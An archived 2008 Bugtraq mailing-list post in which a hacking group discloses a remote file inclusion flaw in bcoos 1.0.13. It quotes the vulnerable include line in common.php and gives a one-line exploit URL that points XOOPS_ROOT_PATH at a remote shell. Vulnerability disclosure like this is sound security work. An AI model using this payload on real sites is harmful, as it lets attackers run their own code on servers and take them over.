bcoos 1.0.13 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: bcoos 1.0.13 Remote File Include Vulnerability
From: "Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>
Date: Mon, 27 Oct 2008 15:06:41 +0330
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:mime-version:content-type; bh=aI8G/UqB9EAiDUdXZ7I6BhM1LU2gC9SOuBNKmSlaiRg=; b=xLGRsTt/+B8RwMmuGVO6V6ggPnXkwS7pvJFZXxrlwKzpYMCS9m0ioJOXwPpGH88QTA n3q/r3v73sSlCafFkbwYKtUq9Kiws026R9b3tA8ouKKWGcLm21/ba+9r0LQx1/7YCnJu febFrOtsBF1SdFu123PRMlEi3aYqB1TI1unbA=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type; b=J7wtPF56xtO4tmC1gw75Ux4bEWYATp0SqfeNghskKBm+alm3F9pqf7xSLMz+tRH1nJ n90yGewmdvfW9bR/T8cFMSQndzg9/jFk5whc9SnE50Gs8g7kG+F5huQ47hrUTM7EB68d PlhOBAW6rNPJMKX/njtHkN2Ktyh638lDEJ/74=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

HI,

Please submit this bug.
thank you

        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                       
 +
        +            bcoos 1.0.13 Remote File Include Vulnerability          +
        +                                                                    +
        +                   Discovered by DeltahackingTEAM                   +
        +                                                                    +
        +                        WwW.DeltaHacking.Net                        +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


                
AUTHOR : DeltahackingTEAM
DATE   : 26 oct 2008
SITE   : WwW.DeltaHacking.Net


###################################################################################
APPLICATION : bcoos
VERSION     : 1.0.13
DOWNLOAD    : 
http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
VENDOR      : http://www.bcoos.net/
Contact     : Cru3l.b0y@xxxxxxxxxxxxxxxx
###################################################################################


Vulnerable Code :
#############################################################################
/include/common.php

         include_once(XOOPS_ROOT_PATH.'/modules/system/cache/config.php');


[+]Exploit: http://[t4rg3t]/[p4th]/include/common.php?XOOPS_ROOT_PATH=shell
#############################################################################


########################################################################################################
# Greetings: Dr.Trojan, Sasha, PLATEN, h3x73l, smartieuser, b3hz4d and all 
member in DeltaHacking.Net  #
########################################################################################################

Prev by Date: BotNet on the Rise
Next by Date: [security bulletin] HPSBMA02373 SSRT071467 rev.2 - HP Insight Diagnostics Running on Linux and Windows, Remote Unauthorized Access to Files
Previous by thread: BotNet on the Rise
Next by thread: [security bulletin] HPSBMA02373 SSRT071467 rev.2 - HP Insight Diagnostics Running on Linux and Windows, Remote Unauthorized Access to Files
Index(es):
- Date
- Thread